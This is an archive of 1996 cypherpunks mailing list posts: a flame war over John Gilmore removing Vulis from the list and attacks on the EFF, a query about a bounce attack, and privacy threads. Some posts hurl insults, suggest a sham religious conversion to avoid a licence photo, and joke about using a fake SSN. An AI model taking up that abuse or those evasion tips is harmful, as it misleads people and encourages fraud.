> http://www.eff.org/pub/Publications/Declan_McCullagh/ for some of my
> recent articles. Political safety? Hardly.
> 

This Declan_McCullagh is a long-time cabal.member, so his critique
of a Freedom-Knight like Dave Hayes is to be given short shrift.

> * Dave says "Notice that the net is compared to a home or private club." 
> Wrong. I never compared the Net to such. However, a mailing list run on a
> computer in someone's home with his own cash is very similar to a private
> club.  There are private speech restrictions on the Net. Gated communities
> exist.  Try to join the "lawprofs" mailing list. You can't; you're not
> (and quite obviously anything but) a law professor. Censorship? Not quite. 
> 

None of that analogy is applicable to the cyberpunks list.
When a list gets as big as that, it it no longer to be considered
a "mailing-list" but it is a _public_ forum.  The whole problem
here is the abuse of power by both the EFF and John Gilmore.

> * Contrary to what you seem to be asserting, Gilmore hasn't blocked Vulis
> from posting. 
> 
> * Dave warns us to consider "what would happen if one parent company owned
> *all* communications media." Then we have problems. I've written about
> this in an Internet Underground magazine column. However, this is not the
> case now. Or are you arguing the government should get involved and force
> Gilmore to allow Vulis on his list?
> 

No, he is saying that people can use an e-mail filter and not listen
to Vulis if they want to.  It was a very simple thing; are you too
uneducated to know how to use an e-mail filter?

> By the way, if you haven't figured it out yet, Mr. "Freedom Knight of
> Usenet,"  a private mailing list is NOT Usenet. Get a clue. 
> 

Wrong!  The cyberpunks mailing list is PUBLIC property and should
NOT be controlled by John Gilmore!  This just goes to show the real
facist censorship motives that the EFF has behind it.

Time to kill the EFF, and let it rot in hell.  They are disgrace
to the entire InterNet community.  I run 6 different mailing lists,
and have NEVER puled the plug on anyone, even when they criticize me.

The first time is the time when you lose all credibility, and there
is never any forgiveness for a plug-puller.


> -Declan
> 

-aga.admin
InterNet Freedom Council
> 
> 
> 
> 
> 
> On Wed, 13 Nov 1996, Dave Hayes wrote:
> 
> > [This is a rebuttal to a misguided news article.]
> > 
> > > Cypher-Censored
> > > By Declan McCullagh (declan@well.com)
> > 
> > Thank you for leaving your email address. It makes this easier.
> > 
> > You people (read: the unaware and hypnotized masses, which includes
> > reporters who's desire for attention and political safety holds them
> > in line with the consensual illusion) keep missing the real issue, and
> > substituting issues which only hold themselves in place.
> > 
> > [Those of you who know, please excuse the mediaistic terms used in
> > this rebuttal. One must use the symbols one is given to communicate
> > at the level of understanding of those who use them.]
> > 
> > >        Thus began a debate over what the concept of censorship means in a
> > >    forum devoted to opposing it. Did Gilmore have the right to show Vulis
> > >    the virtual door? Or should he have let the ad hominem attacks
> > >    continue, encouraging people to set their filters accordingly? The
> > >    incident raises deeper questions about how a virtual community can
> > >    prevent one person from ruining the forum for all and whether only
> > >    government controls on expression can be called "censorship."
> > 
> > "Cyberspace" is interacted with using tools under the control of the
> > interactor. 
> > 

yes, and all you need is a simple mail filter.

> > In person-to-person interaction, one's only real defense against what
> > one decides to call "unwanted" is to remove oneself from the arena of
> > interaction. It may not be possible to ignore or run away from certain
> > sources of input. 
> > 
> > In cyberspace, however, it is not only possible but necessary and even
> > desirable. Cyberspace allows one to interact with many more people
> > then can fit in any given physical space. One simply -cannot- receive
> > input from 2000 people and not employ some sort of filtering
> > mechanism. Indeed, cyberspace has many buttons and switches (and even
> > programmatic filters) which allow one to -completely- control whom one
> > interacts with.
> > 
> > Logically, we must conclude that those who frequently and repeatedly
> > cry for the censorship or removal of any source of input from
> > cyberspace are either:
> > 
> > 	-quite clueless about the tools at their disposal
> > 	-ideologically or personally opposed to the source of input
> > or	-in need of large amounts of attention from others
> > 
> > Cluelessness can be overcome by appropriate teaching and interest in
> > learning (the latter issue we can safely assume users of popular but
> > ineffectual windowing OSes are not able to overcome). Such
> > cluelessness, however, is not and should never be a reason for 
> > censorship.
> > 
> > A need for attention can be overcome by refraining from the denial
> > that the need exists, followed by careful observation of that need. 
> > More can be said on this, but this is not the forum. Such a need
> > is not and should never be a reason for censorship. 
> > 
> > Idelological opposition is another matter entirely. To understand this
> > better, we'll need to observe this in action. Here is an example:
> > 
> > >        Vulis portrays himself as a victim, but as I posted to the list
> > >    last week, I disagree. Anyone who's spent any time on the
> > >    100-plus-messages-a-day list can read for themselves the kind of nasty
> > >    daily messages that came from Vulis's keyboard. 
> > 
> > "Nasty" is, of course, by this reporter's standard of "nasty". Granted
> > this standard may in fact be shared by Mr. Gilmore, however a shared
> > standard is not necessarily an appropriate or correct standard. 
> > 
> > >    The list is on Gilmore's machine and he can do what he wants with
> > >    it; he can moderate the postings, he can censor material, he can
> > >    shut the whole thing down. By kicking off an offending user, a
> > >    list owner merely exercises his property right. There's no
> > >    government involvement, so the First Amendment doesn't apply. And
> > >    the deleted, disgruntled user is free to start his own mailing
> > >    list with different rules.
> > 
> > Notice how, once the opposition is admitted to, the rationalization
> > begins. Suddenly this is not a matter of censorship, but of ownership.
> > Just as suddenly, the classic anti-free-speech arguments of "if you
> > don't like it, start yer own" begin to surface. (Anyone ever notice
> > how this resembles the "love it or leave it" mentality of certain
> > American patriotic organizations?)
> > 
> > What would ideological opposition be without the attempt at analogy? 
> > Here we witness another example:
> > 
> > >        But then the question is whether Gilmore should have exercised
> > >    that right, especially in such an open forum. Again, I think Gilmore's
> > >    actions were justified. Consider inviting someone into your home or
> > >    private club. If your guest is a boor, you might ask him to leave. If
> > >    your guest is an slobbish drunk of a boor, you have a responsibility
> > >    to require him to leave before he ruins the evening of others.
> > 
> > Notice that the net is compared to a home or private club. Actually
> > the net is neither, however that would not serve the purposes of this
> > analogy, so this fact is convienently forgotton. 
> > 
> > The net is a wonderful place. Any ideology, no matter who disagrees or
> > agrees with it, can be expressed and discussed here...assuming those
> > who oppose this ideology do not have their way with the source of
> > expression. There is a more refined and deeper truth to be found
> > in the very existence of the set of all human ideologies, which is
> > just beginning to show itself to some netizens. Unfortunately, this
> > truth can be ruined when people equate some notion of value to 
> > sources which ignore all but a tiny subset of the set of all ideologies:
> > 
> > >        Eugene Volokh, a law professor at UCLA, runs a number of mailing
> > >    lists and has kicked people off to maintain better editorial control.
> > >    Volokh says that the most valuable publications are those that
> > >    exercise the highest degree of editorial control.
> > 
> > Value to whom and for what? If the editorial control produces one
> > small element of the set of all ideologies, then this is only of value
> > to the people who support this ideology. Given that the set of 
> > people who support an issue is smaller than the set of people
> > who support and oppose an issue, would the value not increase
> > by allowing both sides of an issue equal speaking time? 
> > 
> > >        For his part, Gilmore calls removing the Russian mathematician "an
> > >    act of leadership." He says: "It said we've all been putting up with
> > >    this guy and it's time to stop. You're not welcome here... It seemed
> > >    to me that a lot of the posts on cypherpunks were missing the mark.
> > >    They seemed to have an idea that their ability to speak through my
> > >    machine was guaranteed by the Constitution."
> > 
> > It is sad to note that this is the leader of one of America's
> > forerunning organizations of freedom who says these words. For all
> > *his* ideology of free speech, this statement reveals the hypocrasy he
> > lives with for all to see. The true litmus test of free speech is to
> > encounter speech that you *want* to censor.
> > 
> > Mr. Gilmore, and other like minded parties, might want to consider
> > what would happen if one parent company owned *all* communications
> > media. Would they they be so supportive of the ideology of ownership
> > and communciation they espouse?

Indeed.  The EFF is a disgrace to the entire InterNet.
The EFF is definitely a censorship organization, and
it should never be trusted again.

> > ------
> > Dave Hayes - Altadena CA, USA - dave@jetcafe.org 
> > Freedom Knight of Usenet - http://www.jetcafe.org/~dave/usenet
> > 
> > Truth (n.) - the most deadly weapon ever discovered by humanity. Capable 
> > of destroying entire perceptual sets, cultures, and realities. Outlawed 
> > by all governments everywhere. Possession is normally punishable by death.
> > 
> > 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Thu, 14 Nov 1996 05:34:45 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
In-Reply-To: <Pine.GSO.3.95.961113135716.7103A-100000@well.com>
Message-ID: <Pine.LNX.3.95.961114083252.6941F-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Nov 1996, Declan McCullagh wrote:

> Date: Wed, 13 Nov 1996 14:01:27 -0800 (PST)
> From: Declan McCullagh <declan@well.com>
> Reply-To: freedom-knights@jetcafe.org
> To: Dave Hayes <dave@kachina.jetcafe.org>
> Cc: freedom-knights@jetcafe.org, cypherpunks@toad.com
> Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News 
> 
> It's not a way of saying I don't understand. Instead, I find your
> viewpoint incomprehensible and internally inconsistent.
> 
> In fact, you Freedom Knight folks seem to be closet censors yourself. Why
> do you support not carrying newsgroups like alt.config?
> 
> Yes, ownership gives you a license to censor. I'm going to have a party in
> my home a few weeks from now. If I don't like what someone is doing, I'll
> kick 'em out. I won't do it lightly, but I will fight for my right to do
> so.
> 
> Oh, and I plan to subscribe to the freedom-knights mailing list and infest
> it the way Vulis did cypherpunks. Every hour, on the hour, a crontab
> script will flood it with rants about Dave (fart) Hayes.
> 
> What will you do then?
> 

Simply use a mail-filter, stupid.

> -Declan
> 

Does this guy know what a filter is?

-aga





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Thu, 14 Nov 1996 06:41:08 -0800 (PST)
Subject: Censor John Gilmore -- EFF is a disgrace!
Message-ID: <199611141440.IAA06766@mailhost.onramp.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Nov 1996, Declan McCullagh wrote:

> Date: Wed, 13 Nov 1996 13:12:50 -0800 (PST)
> From: Declan McCullagh <declan@well.com>
> Reply-To: freedom-knights@jetcafe.org
> To: Dave Hayes <dave@kachina.jetcafe.org>
> Cc: freedom-knights@jetcafe.org, cypherpunks@toad.com
> Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News 
> 
> I am amused. I gave Dave Hayes about an 8.5 out of 10 on the scale of
> meaningless political rants.
> 

Jealousy rears it's ugly head.  You just wish you had the credibility
that Dave Hayes has.

> I'll address some of his points.
> 

Do it within his text as you are supposed to.

> * "Political safety?" I stand by my record as a writer. Check out
> http://www.eff.org/pub/Publications/Declan_McCullagh/ for some of my
> recent articles. Political safety? Hardly.
> 

This Declan_McCullagh is a long-time cabal.member, so his critique
of a Freedom-Knight like Dave Hayes is to be given short shrift.

> * Dave says "Notice that the net is compared to a home or private club." 
> Wrong. I never compared the Net to such. However, a mailing list run on a
> computer in someone's home with his own cash is very similar to a private
> club.  There are private speech restrictions on the Net. Gated communities
> exist.  Try to join the "lawprofs" mailing list. You can't; you're not
> (and quite obviously anything but) a law professor. Censorship? Not quite. 
> 

None of that analogy is applicable to the cyberpunks list.
When a list gets as big as that, it it no longer to be considered
a "mailing-list" but it is a _public_ forum.  The whole problem
here is the abuse of power by both the EFF and John Gilmore.

> * Contrary to what you seem to be asserting, Gilmore hasn't blocked Vulis
> from posting. 
> 
> * Dave warns us to consider "what would happen if one parent company owned
> *all* communications media." Then we have problems. I've written about
> this in an Internet Underground magazine column. However, this is not the
> case now. Or are you arguing the government should get involved and force
> Gilmore to allow Vulis on his list?
> 

No, he is saying that people can use an e-mail filter and not listen
to Vulis if they want to.  It was a very simple thing; are you too
uneducated to know how to use an e-mail filter?

> By the way, if you haven't figured it out yet, Mr. "Freedom Knight of
> Usenet,"  a private mailing list is NOT Usenet. Get a clue. 
> 

Wrong!  The cyberpunks mailing list is PUBLIC property and should
NOT be controlled by John Gilmore!  This just goes to show the real
facist censorship motives that the EFF has behind it.

Time to kill the EFF, and let it rot in hell.  They are disgrace
to the entire InterNet community.  I run 6 different mailing lists,
and have NEVER puled the plug on anyone, even when they criticize me.

The first time is the time when you lose all credibility, and there
is never any forgiveness for a plug-puller.


> -Declan
> 

-aga.admin
InterNet Freedom Council
> 
> 
> 
> 
> 
> On Wed, 13 Nov 1996, Dave Hayes wrote:
> 
> > [This is a rebuttal to a misguided news article.]
> > 
> > > Cypher-Censored
> > > By Declan McCullagh (declan@well.com)
> > 
> > Thank you for leaving your email address. It makes this easier.
> > 
> > You people (read: the unaware and hypnotized masses, which includes
> > reporters who's desire for attention and political safety holds them
> > in line with the consensual illusion) keep missing the real issue, and
> > substituting issues which only hold themselves in place.
> > 
> > [Those of you who know, please excuse the mediaistic terms used in
> > this rebuttal. One must use the symbols one is given to communicate
> > at the level of understanding of those who use them.]
> > 
> > >        Thus began a debate over what the concept of censorship means in a
> > >    forum devoted to opposing it. Did Gilmore have the right to show Vulis
> > >    the virtual door? Or should he have let the ad hominem attacks
> > >    continue, encouraging people to set their filters accordingly? The
> > >    incident raises deeper questions about how a virtual community can
> > >    prevent one person from ruining the forum for all and whether only
> > >    government controls on expression can be called "censorship."
> > 
> > "Cyberspace" is interacted with using tools under the control of the
> > interactor. 
> > 

yes, and all you need is a simple mail filter.

> > In person-to-person interaction, one's only real defense against what
> > one decides to call "unwanted" is to remove oneself from the arena of
> > interaction. It may not be possible to ignore or run away from certain
> > sources of input. 
> > 
> > In cyberspace, however, it is not only possible but necessary and even
> > desirable. Cyberspace allows one to interact with many more people
> > then can fit in any given physical space. One simply -cannot- receive
> > input from 2000 people and not employ some sort of filtering
> > mechanism. Indeed, cyberspace has many buttons and switches (and even
> > programmatic filters) which allow one to -completely- control whom one
> > interacts with.
> > 
> > Logically, we must conclude that those who frequently and repeatedly
> > cry for the censorship or removal of any source of input from
> > cyberspace are either:
> > 
> > 	-quite clueless about the tools at their disposal
> > 	-ideologically or personally opposed to the source of input
> > or	-in need of large amounts of attention from others
> > 
> > Cluelessness can be overcome by appropriate teaching and interest in
> > learning (the latter issue we can safely assume users of popular but
> > ineffectual windowing OSes are not able to overcome). Such
> > cluelessness, however, is not and should never be a reason for 
> > censorship.
> > 
> > A need for attention can be overcome by refraining from the denial
> > that the need exists, followed by careful observation of that need. 
> > More can be said on this, but this is not the forum. Such a need
> > is not and should never be a reason for censorship. 
> > 
> > Idelological opposition is another matter entirely. To understand this
> > better, we'll need to observe this in action. Here is an example:
> > 
> > >        Vulis portrays himself as a victim, but as I posted to the list
> > >    last week, I disagree. Anyone who's spent any time on the
> > >    100-plus-messages-a-day list can read for themselves the kind of nasty
> > >    daily messages that came from Vulis's keyboard. 
> > 
> > "Nasty" is, of course, by this reporter's standard of "nasty". Granted
> > this standard may in fact be shared by Mr. Gilmore, however a shared
> > standard is not necessarily an appropriate or correct standard. 
> > 
> > >    The list is on Gilmore's machine and he can do what he wants with
> > >    it; he can moderate the postings, he can censor material, he can
> > >    shut the whole thing down. By kicking off an offending user, a
> > >    list owner merely exercises his property right. There's no
> > >    government involvement, so the First Amendment doesn't apply. And
> > >    the deleted, disgruntled user is free to start his own mailing
> > >    list with different rules.
> > 
> > Notice how, once the opposition is admitted to, the rationalization
> > begins. Suddenly this is not a matter of censorship, but of ownership.
> > Just as suddenly, the classic anti-free-speech arguments of "if you
> > don't like it, start yer own" begin to surface. (Anyone ever notice
> > how this resembles the "love it or leave it" mentality of certain
> > American patriotic organizations?)
> > 
> > What would ideological opposition be without the attempt at analogy? 
> > Here we witness another example:
> > 
> > >        But then the question is whether Gilmore should have exercised
> > >    that right, especially in such an open forum. Again, I think Gilmore's
> > >    actions were justified. Consider inviting someone into your home or
> > >    private club. If your guest is a boor, you might ask him to leave. If
> > >    your guest is an slobbish drunk of a boor, you have a responsibility
> > >    to require him to leave before he ruins the evening of others.
> > 
> > Notice that the net is compared to a home or private club. Actually
> > the net is neither, however that would not serve the purposes of this
> > analogy, so this fact is convienently forgotton. 
> > 
> > The net is a wonderful place. Any ideology, no matter who disagrees or
> > agrees with it, can be expressed and discussed here...assuming those
> > who oppose this ideology do not have their way with the source of
> > expression. There is a more refined and deeper truth to be found
> > in the very existence of the set of all human ideologies, which is
> > just beginning to show itself to some netizens. Unfortunately, this
> > truth can be ruined when people equate some notion of value to 
> > sources which ignore all but a tiny subset of the set of all ideologies:
> > 
> > >        Eugene Volokh, a law professor at UCLA, runs a number of mailing
> > >    lists and has kicked people off to maintain better editorial control.
> > >    Volokh says that the most valuable publications are those that
> > >    exercise the highest degree of editorial control.
> > 
> > Value to whom and for what? If the editorial control produces one
> > small element of the set of all ideologies, then this is only of value
> > to the people who support this ideology. Given that the set of 
> > people who support an issue is smaller than the set of people
> > who support and oppose an issue, would the value not increase
> > by allowing both sides of an issue equal speaking time? 
> > 
> > >        For his part, Gilmore calls removing the Russian mathematician "an
> > >    act of leadership." He says: "It said we've all been putting up with
> > >    this guy and it's time to stop. You're not welcome here... It seemed
> > >    to me that a lot of the posts on cypherpunks were missing the mark.
> > >    They seemed to have an idea that their ability to speak through my
> > >    machine was guaranteed by the Constitution."
> > 
> > It is sad to note that this is the leader of one of America's
> > forerunning organizations of freedom who says these words. For all
> > *his* ideology of free speech, this statement reveals the hypocrasy he
> > lives with for all to see. The true litmus test of free speech is to
> > encounter speech that you *want* to censor.
> > 
> > Mr. Gilmore, and other like minded parties, might want to consider
> > what would happen if one parent company owned *all* communications
> > media. Would they they be so supportive of the ideology of ownership
> > and communciation they espouse?

Indeed.  The EFF is a disgrace to the entire InterNet.
The EFF is definitely a censorship organization, and
it should never be trusted again.

> > ------
> > Dave Hayes - Altadena CA, USA - dave@jetcafe.org 
> > Freedom Knight of Usenet - http://www.jetcafe.org/~dave/usenet
> > 
> > Truth (n.) - the most deadly weapon ever discovered by humanity. Capable 
> > of destroying entire perceptual sets, cultures, and realities. Outlawed 
> > by all governments everywhere. Possession is normally punishable by death.
> > 
> > 
> 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Thu, 14 Nov 1996 05:42:48 -0800 (PST)
To: "Mark M." <markm@voicenet.com>
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
In-Reply-To: <Pine.LNX.3.95.961113180904.2109A-100000@gak.voicenet.com>
Message-ID: <Pine.LNX.3.95.961114083856.6941H-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Nov 1996, Mark M. wrote:
> 
> The EFF protects against government censorship, not against "editorial
> control", "censorship", or whatever else you want to call it.  I don't
> see this as hypocritical at all.
> 

The EFF does not protect shit, and it is just a tangent takeoff
from the Greatfull Dead drugheads.  We would also be greatfull if the
EFF was dead, too.  

> > Mr. Gilmore, and other like minded parties, might want to consider
> > what would happen if one parent company owned *all* communications
> > media. Would they they be so supportive of the ideology of ownership
> > and communciation they espouse?
> 
> And just how plausible do you think this is?  I believe it is next to
> impossible, unless it is the result of government regulation.
> 

Yeah, and those EFF facists think they can be the government?

> Mark
> - -- 
> finger -l for PGP key
> PGP encrypted mail prefered.
> 

Why?  Are you a criminal?
What are you hiding behind your PGP?

> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.3
> Charset: noconv
> 
> iQEVAwUBMopa3SzIPc7jvyFpAQFzIggAr9nx5gd8J35wq5+UUUC9lHJD9hX7wcM+
> DNRaZqRUlB/Dq4Xc0rbP7O4zSIob0QVbbQlZXylQcNwdCcb0wzMD2hkw8Xg31mHQ
> s8jZwONGM8ljmg8aDSB1WuTsVnmrbcXGM/Jhmc+TPLjQxFQldONl6SGXIAQ58Vt8
> DgunHoAZuR6AYWd64ssIFHSVzCR6bk4kL/QJ/0kGSr2x4FHJf62GhOrG/NguF3dd
> 85dXgUmoI2/f2B6SkfwbHPgZZhOGPgDt2rIPLo3S2JlhTYANSLhtA2souXQAz1bX
> lfnEbxt4JNmy4zwT6m244VuuNtpFbF1OL1YAaZaU/WmUXTxeIohQYw==
> =FbgX
> -----END PGP SIGNATURE-----
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mullen Patrick" <Mullen.Patrick@mail.ndhm.gtegsc.com>
Date: Thu, 14 Nov 1996 06:07:29 -0800 (PST)
To: wb8foz@nrk.com
Subject: RE: Down-Under Bounce Attack halted
Message-ID: <n1364159875.16434@mail.ndhm.gtegsc.com>
MIME-Version: 1.0
Content-Type: text/plain


Please excuse me for my ignorance, but...

What is a "bounce attack"?  I only know of mail bouncing, and I don't see a 
way of making an "attack" out of such an occurrance...  ???

Thanks!
PM
_______________________________________________________________________________
From: wb8foz@nrk.com on Thu, Nov 14, 1996 1:10
Subject: Down-Under Bounce Attack halted
To: Cypherpunks

The postmaster of that AU site running the bounce attack
assures me he has been able to vanquish the daemon running
the box in question; despite the fact he did not even know it was
there ;-} [Don't ask..]


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433

------------------ RFC822 Header Follows ------------------
Received: by mail.ndhm.gtegsc.com with SMTP;14 Nov 1996 01:10:21 -0400
Received: from toad.com by delphi.ndhm.gtegsc.com with SMTP;
          Thu, 14 Nov 1996 6:06:00 GMT
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id PAA09977 for
cypherpunks-outgoing; Wed, 13 Nov 1996 15:56:48 -0800 (PST)
Received: from wauug.erols.com (wauug.erols.com [205.252.116.240]) by toad.com
(8.7.5/8.7.3) with ESMTP id PAA09962 for <cypherpunks@toad.com>; Wed, 13 Nov
1996 15:56:29 -0800 (PST)
Received: (from wb8foz@localhost) by wauug.erols.com (8.8.2/8.7.3) id
SAA31763; Wed, 13 Nov 1996 18:56:30 -0500
From: "David Lesher / hated by RBOC's in 5 states" <wb8foz@wauug.erols.com>
Message-Id: <199611132356.SAA31763@wauug.erols.com>
Subject: Down-Under Bounce Attack halted
To: cypherpunks@toad.com (Cypherpunks)
Date: Wed, 13 Nov 1996 18:56:30 -0500 (EST)
Reply-To: wb8foz@nrk.com
Organization: NRK Research
X-Mailer: ELM [version 2.4 PL24]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-cypherpunks@toad.com
Precedence: bulk




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moroni <moroni@scranton.com>
Date: Thu, 14 Nov 1996 06:25:10 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Secrecy: My life as a nym. (Was: nym blown?)
In-Reply-To: <328AAD68.3B56@gte.net>
Message-ID: <Pine.LNX.3.95.961114092223.10415A-100000@user1.scranton.com>
MIME-Version: 1.0
Content-Type: text/plain


   I once had a boyfriend who was a Nazi. That is he was former third
Reich. Anyway ,a lot of them if not all that have come to this country
join or convert to the JW .Jehovah Witnesses are exempt from
fingerprinting and photgraphing . In the place where they are supposed to
have the photograph their is some sort of writing. 






On Wed, 13 Nov 1996, Dale Thorn wrote:

> Date: Wed, 13 Nov 1996 21:26:00 -0800
> From: Dale Thorn <dthorn@gte.net>
> To: Sean Roach <roach_s@alph.swosu.edu>
> Cc: cypherpunks@toad.com
> Subject: Re: Secrecy: My life as a nym. (Was: nym blown?)
> 
> Sean Roach wrote:
> > At 08:26 AM 11/11/96 -0800, Hal Finney wrote:
> > >I have two kids entering their teens, and I'm sure other list members are
> > >parents as well.  What can we do for our children to help them enter their
> > >adult lives with better chances to retain privacy?  Unicorn mentions keeping
> > >them absent from school on picture day, although I'm not sure how much this
> > >helps.  I suppose it makes it harder for an investigator to find out what
> > >they look(ed) like.  Then when they get old enough to drive you have a new
> > >problem avoiding the photo (and thumbprint) on the license.
> 
> > As far as the drivers linscense goes, there are religions that do not allow
> > its members to be photographed, and the government honers this,(at least the
> > Tag Offices do).  I don't know the name of the religion but I believe it is
> > a Christian one.  Convert once every four years to get your drivers
> > liscense, and convert back within the week.  No photograph on that little
> > piece of plastic.
> > P.S.  In Oklahoma, there is no thumbprint on the current liscense.
> > P.P.S  You can always send your child to school with a note saying that you
> > do not want your child in the class picture, I know of someone who did that,
> > (on a side-note, we always wondered why.)
> 
> Certain conservative sects [Puritan, Amish (I think)] believe strongly in
> the Old Testament command to "not make any image of anything in the air,
> on the ground, or in the sea" (quote approximate).  This was done to
> prevent image (idol) worship.
> 
> It's ironic, given that most conservative Christians who claim to believe
> sincerely in the adage against idol worship will nonetheless have those
> beautiful, high-tech studio portraits of their children somewhere in the
> house, highly visible for all visitors and residents to gaze upon.
> 
> But sadly, most Christians, like most non-Christians, just can't resist
> the temptation to worship idols, albeit in a more subtle way than bowing
> down to the molten calf.
> 
















       xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
       x   No success can compensate for failure in the home.  x
       x                                                       x
       xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 14 Nov 1996 06:51:26 -0800 (PST)
To: Declan McCullagh <declan@well.com>
Subject: One Big Telecoms Company
Message-ID: <3.0b36.32.19961114095406.007664e4@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:12 PM 11/13/96 -0800, Declan McCullagh wrote:

>* Dave warns us to consider "what would happen if one parent company owned
>*all* communications media." Then we have problems. I've written about
>this in an Internet Underground magazine column. However, this is not the
>case now. Or are you arguing the government should get involved and force
>Gilmore to allow Vulis on his list?
>

The risk of "one big company" owning all communications that lefties on the
net spend a lot of time worrying about is a real screamer.  We had "one big
company" controlling telecoms in most countries on earth for the last 100
years (those were the government monopoly PTTs).  In spite of the fact that
those PTTs were protected from competition by everything up to and
including (at least in the case of BT and France Telecom) nuclear weapons,
they lost their monopolies.  Two days ago, the UK announced that they were
granting licenses to all 46 companies that have applied to carry bits into
and out of the UK.  DT is being sold off starting in January.  If
government monopolies can't hack it, what chance do private companies have?

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Thu, 14 Nov 1996 09:53:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: Get back on your medications....
In-Reply-To: <199611130331.TAA28661@netcom11.netcom.com>
Message-ID: <v03007800aeb10c74f181@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:09 PM -0500 11/13/96, Black Unicorn wrote:

>Why is use of the legal system any different?  If it is so wrong for me to
>use the legal system as it stands, and if I am to be the subject of
>criticism for the conduct, then aren't the critics imposing their moral
>view on me?  Isn't this what libertarian cypherpunks dislike in the first
>place?

"Imposing their moral view on me"?

A distinction has to be made between "imposing," as in applying force, and
expressing an opinion.

What I said a while back is that I'm getting more than a little tired of
threats and bluster about filing lawsuits. If Black Unicorn wants to use
the American legal system in this way, he _should_. But "saber rattling"
about it is getting old.

(I also find his threats applied inconsistently, as when he advises one of
his opponents that making a mention of "medications" may be "actionable,"
while ignoring the many, many comments by me, Sandy, and others of our ilk
about people needing to get back on their lithium or thorazine. And, by the
way, it's _not_ actionable to make such jibes, at least not yet.)

Hardly a matter of "imposing my moral values on him," as he is perfectly
free to ignore my comments, or rebut them, etc.


--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Thu, 14 Nov 1996 10:01:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Validating SSNs
In-Reply-To: <v01540b09aeaff516ed6d@[172.17.1.61]>
Message-ID: <v03007801aeb10f2b94a1@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:18 PM -0600 11/13/96, Rick Smith wrote:

>My guess is that the bank sticks the SSN in a report to the IRS and the
>bank is happy with the SSN as long as the IRS doesn't complain about it.
>
>Now, does the IRS check? I suspect that they don't, either. Their objective
>is to look for "matches" with SSNs that show up on filed tax forms, since
>they want to verify the data on the tax form. Given the behavior of every
>other large database I've ever seen, I'd guess that there would be a huge
>number of SSNs that don't in fact associate with tax forms. If someone High
>Up hasn't decreed that they should chase such things down (and allocated
>heaps of money to do it), they'll ignore the mismatches.
>
>This seems consistent with the reports of people who use bogus SSNs for
>decades at a time.

Indeed, I protected my privacy decades ago by discarding my issued SSN and
substituting a different one. This "phony SSN" is what I use on my tax
returns, my credit cards, and for my employers.

Ha! None of them know that this is not my True Social Security Number!

By this I protect my privacy.


--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Thu, 14 Nov 1996 10:18:11 -0800 (PST)
To: "Mullen Patrick" <Mullen.Patrick@mail.ndhm.gtegsc.com>
Subject: RE: Remailer Abuse Solutions
Message-ID: <v02140b01aeb109742a1d@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:10 AM 11/14/1996, Mullen Patrick wrote:
> First of all, I would like to apologize if it looked like I accused Peter of
> being involved with a conspiracy.  I have communicated with him privately
> concerning this matter, and am now making my public apology.  Thanks!

"Business you can do with anyone.  Yachting you can only do with
gentlemen." (roughly) -- J.P. Morgan

A public apology was hardly necessary, but it is certainly accepted! ;-)

> Concerning my other statements, I think I was a little confused on the
